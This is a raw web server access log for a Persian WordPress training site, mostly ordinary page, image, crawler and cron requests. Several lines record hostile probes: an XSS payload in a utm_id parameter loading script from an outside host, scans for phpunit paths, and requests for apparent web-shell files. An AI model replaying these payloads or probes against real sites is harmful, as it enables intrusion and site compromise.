91.84.104.205 - - [03/May/2025:03:55:52 +0330] "GET / HTTP/1.1" 200 32578 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:56:53 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:57:06 +0330] "POST /courses/gams-la/ HTTP/1.1" 200 37833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:57:21 +0330] "POST /wp-admin/admin-ajax.php?action=wpdAddSubscription HTTP/1.1" 200 80 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:57:39 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94827 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:10 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94826 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:17 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94827 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:23 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94828 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:30 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
91.84.104.205 - - [03/May/2025:03:58:35 +0330] "GET /posts-news/ HTTP/1.1" 200 32181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:59:05 +0330] "POST /posts-news/ HTTP/1.1" 200 32181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:03:59:44 +0330] "GET /wp-content/uploads/2023/11/Gurobo_CPLEX.jpg HTTP/1.1" 200 180626 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:57:57 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
91.84.104.205 - - [03/May/2025:03:58:02 +0330] "GET /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94828 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:03:58:52 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1-150x150.png HTTP/1.1" 200 18579 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:51 +0330] "POST /posts-news/ HTTP/1.1" 200 32181 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.73.164.190 - - [03/May/2025:03:58:56 +0330] "POST /posts-news/ HTTP/1.1" 200 32181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:29 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 404 15368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:42 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:44 +0330] "GET /not-found HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:47 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:10:10 +0330] "GET /wp-content/uploads/2021/02/2-2.jpg HTTP/1.1" 200 74240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
31.214.174.196 - - [03/May/2025:04:16:22 +0330] "POST /wp-cron.php?doing_wp_cron=1746233181.9903619289398193359375 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [03/May/2025:04:16:19 +0330] "POST /?wordfence_syncAttackData=1746233179.7803 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
172.191.111.212 - - [03/May/2025:04:16:51 +0330] "GET /wp-content/uploads/2022/10/Mulvey.jpg HTTP/1.1" 200 117113 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:16:54 +0330] "GET /wp-content/uploads/2022/10/GAMS-1.png HTTP/1.1" 200 38573 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:19:24 +0330] "GET /wp-content/uploads/2022/07/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%AA%DA%A9%D9%86%DB%8C%DA%A9_%D9%87%D8%A7%DB%8C-%D8%AA%D8%AC%D8%B2%DB%8C%D9%87-%D9%88%D8%B1%D9%88%DB%8C%DA%A9%D8%B1%D8%AF-%D9%87%D8%A7%DB%8C-%D8%AF%D9%82%DB%8C%D9%82.png HTTP/1.1" 200 257351 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:19:51 +0330] "GET /wp-content/uploads/2022/10/%D8%A7%D8%B5%D9%88%D9%84_%D8%A8%D9%87%DB%8C%D9%86%D9%87_%D8%B3%D8%A7%D8%B2%DB%8C.jpg HTTP/1.1" 200 121080 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
193.186.4.40 - - [03/May/2025:04:20:59 +0330] "GET /courses/gams-la/ HTTP/2" 200 37832 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:36 +0330] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 404 15368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:08:06 +0330] "GET /wp-content/uploads/2022/08/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%AF%D9%85%D8%B2.png HTTP/1.1" 200 190617 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
94.102.49.19 - - [03/May/2025:04:12:13 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:04:12:13 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
172.191.111.212 - - [03/May/2025:04:14:29 +0330] "GET /wp-content/uploads/2022/11/Mulvey.jpg HTTP/1.1" 200 29642 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:14:52 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D9%87%DB%8C%D9%86%D9%87-%D8%B3%D8%A7%D8%B2%DB%8C-%D8%A7%D8%B3%D8%AA%D9%88%D8%A7%D8%B1-%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%AA%D8%B5%D8%A7%D8%AF%D9%81%DB%8C-1.png HTTP/1.1" 200 878514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
43.130.106.18 - - [03/May/2025:04:16:18 +0330] "GET / HTTP/1.1" 200 32579 "http://optimyar.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.191.111.212 - - [03/May/2025:04:18:07 +0330] "GET /wp-content/uploads/2022/07/%D8%B5%D9%86%D8%B9%D8%AA%DB%8C.jpg HTTP/1.1" 200 89654 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:18:48 +0330] "GET /wp-content/uploads/2021/02/2.jpg HTTP/1.1" 200 103034 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
31.214.174.196 - - [03/May/2025:04:21:01 +0330] "POST /wp-cron.php?doing_wp_cron=1746233461.5494558811187744140625 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
74.125.208.97 - - [03/May/2025:04:20:59 +0330] "GET /.well-known/traffic-advice HTTP/1.1" 404 15318 "-" "Chrome Privacy Preserving Prefetch Proxy"
172.191.111.212 - - [03/May/2025:04:22:25 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%AF%D8%B1-%D8%B9%D8%AF%D9%85-%D9%82%D8%B7%D8%B9%DB%8C%D8%AA-1-1024x396.png HTTP/1.1" 200 314102 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:22:47 +0330] "GET /wp-content/plugins/wpdiscuz/assets/img/plugin-icon/icon_info.png HTTP/1.1" 200 3063 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:29:02 +0330] "GET /wp-content/uploads/2021/02/4.jpg HTTP/1.1" 200 76242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:29:04 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%B1%DB%8C%D8%A7%D8%B6%DB%8C.png HTTP/1.1" 200 189587 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
52.250.23.209 - - [03/May/2025:04:30:28 +0330] "GET /wp-content/uploads/2022/02/Optimyar.png HTTP/1.1" 200 1429857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
172.191.111.212 - - [03/May/2025:04:30:47 +0330] "GET /wp-content/uploads/2022/11/DDRO.jpg HTTP/1.1" 200 31167 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:35:02 +0330] "GET /wp-content/uploads/2022/02/OptimYar-Logo-2048x1348.jepg_-300x197.png HTTP/1.1" 200 35754 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:21 +0330] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 403 17004 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:22 +0330] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 102184 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:29 +0330] "GET /aowjtshj.php?Fox=d3wL7 HTTP/1.1" 404 101881 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.191.111.212 - - [03/May/2025:04:40:32 +0330] "GET /wp-content/uploads/2023/02/cplex.jpg HTTP/1.1" 200 29524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:40:33 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%AF%D8%B1-%D8%B9%D8%AF%D9%85-%D9%82%D8%B7%D8%B9%DB%8C%D8%AA.png HTTP/1.1" 200 194985 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:34:06 +0330] "GET /wp-content/uploads/2021/10/login_bg.371e82b2.png HTTP/1.1" 200 76258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
31.214.174.196 - - [03/May/2025:04:38:22 +0330] "POST /?wordfence_syncAttackData=1746234502.6645 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
172.191.111.212 - - [03/May/2025:04:38:27 +0330] "GET /wp-content/uploads/2022/08/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%AF%D9%85%D8%B2-1-1024x396.png HTTP/1.1" 200 294972 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:43:06 +0330] "GET /wp-content/uploads/2021/02/1.jpg HTTP/1.1" 200 59229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:48:09 +0330] "GET /wp-content/uploads/2021/02/3.jpg HTTP/1.1" 200 43017 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
66.249.64.129 - - [03/May/2025:04:42:25 +0330] "GET /robots.txt HTTP/1.1" 200 123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.129 - - [03/May/2025:04:42:27 +0330] "GET /?o=178730984 HTTP/1.1" 200 32579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.59 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.128 - - [03/May/2025:04:50:10 +0330] "GET /?o=483663184 HTTP/1.1" 200 32579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.59 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.19 - - [03/May/2025:04:53:03 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
172.191.111.212 - - [03/May/2025:04:54:34 +0330] "GET /wp-content/uploads/2022/10/%D8%AA%D8%AC%D8%B2%DB%8C_%D8%A8%D9%86%D8%AF%D8%B1%D8%B2.png HTTP/1.1" 200 48028 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:57:23 +0330] "GET /wp-content/uploads/2022/10/%D8%AA%DA%A9%D9%86%DB%8C%DA%A9-%D9%87%D8%A7%DB%8C-%D8%AA%D8%AC%D8%B2%DB%8C%D9%87.png HTTP/1.1" 200 190617 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
94.130.143.102 - - [03/May/2025:04:58:56 +0330] "GET /wp-content/themes/realestate-7/style.css HTTP/1.1" 404 15368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
172.191.111.212 - - [03/May/2025:04:59:22 +0330] "GET /Pictures/ashkan_teymori.jpg HTTP/1.1" 404 101884 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:02:29 +0330] "GET /Pictures/ashkan_teymori.jpg HTTP/1.1" 404 101884 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:02:33 +0330] "GET /Pictures/ashkan_teymori.jpg HTTP/1.1" 404 101884 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:04:20 +0330] "GET /wp-content/uploads/2021/01/Ali-Papi.jpg HTTP/1.1" 200 39828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:05:12 +0330] "GET /wp-content/uploads/2022/11/Data-extraction-rafiki-1024x1024.png HTTP/1.1" 200 105060 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:07:25 +0330] "GET /wp-content/uploads/2021/02/4-1.jpg HTTP/1.1" 200 92219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:07:29 +0330] "GET /wp-content/uploads/2022/11/Data-Driven-minimax-Regret-Robust-Optimization.jpg HTTP/1.1" 200 40084 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
31.214.174.196 - - [03/May/2025:05:13:06 +0330] "POST /?wordfence_syncAttackData=1746236586.0995 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
31.214.174.196 - - [03/May/2025:05:13:07 +0330] "POST /wp-cron.php?doing_wp_cron=1746236587.9430088996887207031250 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
178.73.233.115 - - [03/May/2025:05:13:10 +0330] "GET / HTTP/1.1" 200 32578 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
31.214.174.196 - - [03/May/2025:04:58:51 +0330] "POST /?wordfence_syncAttackData=1746235731.4362 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
94.130.143.102 - - [03/May/2025:04:58:50 +0330] "GET /wp-content/themes/realestate-7/style.css HTTP/1.1" 404 15368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
172.191.111.212 - - [03/May/2025:05:05:11 +0330] "GET /wp-content/uploads/2022/10/%D8%AA%DA%A9%D9%86%DB%8C%DA%A9-%D9%87%D8%A7%DB%8C-%D8%AE%D8%B7%DB%8C-%D8%B3%D8%A7%D8%B2%DB%8C.png HTTP/1.1" 200 199234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
93.158.71.185 - - [03/May/2025:05:13:05 +0330] "GET /robots.txt HTTP/1.1" 200 123 "http://optimyar.com/robots.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
31.214.174.196 - - [03/May/2025:05:15:15 +0330] "POST /wp-cron.php?doing_wp_cron=1746236715.2575230598449707031250 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
66.249.64.129 - - [03/May/2025:05:18:55 +0330] "GET / HTTP/1.1" 200 32578 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.128 - - [03/May/2025:05:18:59 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font.css?ver=2.13.9 HTTP/1.1" 200 1874 "https://optimyar.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.128 - - [03/May/2025:05:19:00 +0330] "GET /wp-content/plugins/elementor-extras/assets/css/frontend-rtl.min.css?ver=2.2.52 HTTP/1.1" 200 23590 "https://optimyar.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.128 - - [03/May/2025:05:19:01 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.5.0 HTTP/1.1" 200 5290 "https://optimyar.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
66.249.64.128 - - [03/May/2025:05:19:01 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/fonts/efaicons.woff2 HTTP/1.1" 200 24716 "https://optimyar.com/wp-content/plugins/persian-elementor/includes/icons/efaicons/style.css?ver=2.13.9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/134.0.6998.165 Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:32 +0330] "GET /elementor-34777/ HTTP/2" 200 83032 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/themes/skelementor/style.css?ver=6.8.1 HTTP/2" 200 820 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
151.238.7.7 - - [03/May/2025:05:19:36 +0330] "GET /wp-content/plugins/elementor/assets/css/frontend-rtl.min.css?ver=3.28.4 HTTP/2" 200 6454 "https://optimyar.com/elementor-34777/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
